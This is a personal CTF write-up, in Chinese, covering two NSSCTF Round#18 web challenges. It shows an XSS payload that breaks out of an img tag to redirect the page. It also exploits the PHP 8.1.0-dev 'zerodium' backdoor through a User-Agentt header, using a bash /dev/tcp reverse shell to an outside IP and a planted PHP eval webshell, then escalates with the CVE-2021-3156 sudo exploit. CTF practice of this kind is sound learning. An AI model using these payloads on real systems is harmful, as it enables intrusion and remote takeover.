【Web】NSSCTF Round#18 Basic个人wp(部分)

目录

①门酱想玩什么呢?

②Be***eroot


①门酱想玩什么呢?

先试一下随便给个链接

不能访问远程链接,结合评论区功能,不难联想到xss,只要给个评论区链接让门酱访问就可

我们研究下评论区

从评论区知道,要让门酱玩元梦之星,考虑直接

<script>document.location="https://ymzx.qq.***/";</script>

尝试传了发现不能起作用跳转,估计是<>这些被html实体化了

那咋整呢,题目里还提供了评论插入图片功能

我们就按示例传一下(必须以http://开头,否则不能解析为图片)

 

链接是插入到了src中,我们可以直接用">闭合img标签

评论传

http://"><script>document.location="https://ymzx.qq.***/";</script>.png 123 /png

 成功重定向到元梦之星官网

bp抓包

获得该条恶意评论链接

http://node1.anna.nssctf.***:28834/words/?title=MQ%3D%3D&content=aHR0***UzQSUyRiUyRiUyMiUzRSUzQ3NjcmlwdCUzRWRvY3VtZW50LmxvY2F0aW9uJTNEJTIyaHR0cHMlM0ElMkYlMkZ5bXp4LnFxLmNvbSUyRiUyMiUzQiUzQyUyRnNjcmlwdCUzRS5wbmclMjAxMjMlMjAlMkZwbmc%3D

把这个链接给门酱即可获得flag

②Be***eroot

进来直接告诉我们php版本是8.1.0-dev

PHP-8.1.0-dev 后门命令执行漏洞复现_php/8.1.0-dev-CSDN博客

User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/124.222.136.33/1337 0>&1'");

直接反弹shell,发现要提权

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令

脚本不太好整到靶机上,还是写马连webshell方便点

User-Agentt: zerodiumsystem("echo '<?php eval(\$_POST[1])?>'>/var/www/html/1.php");

尝试用suid提权插件来整,失败

发现题目提示:

看一下sudo版本

 

不难找到对应CVE

CVE-2021-3156 sudo权限提升漏洞

GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令 脚本传到服务器的/tmp目录下

 

进行提权,直接rce

转载请说明出处内容投诉
CSS教程_站长资源网 » 【Web】NSSCTF Round#18 Basic个人wp(部分)

发表评论

欢迎 访客 发表评论

一个令你着迷的主题!

查看演示 官网购买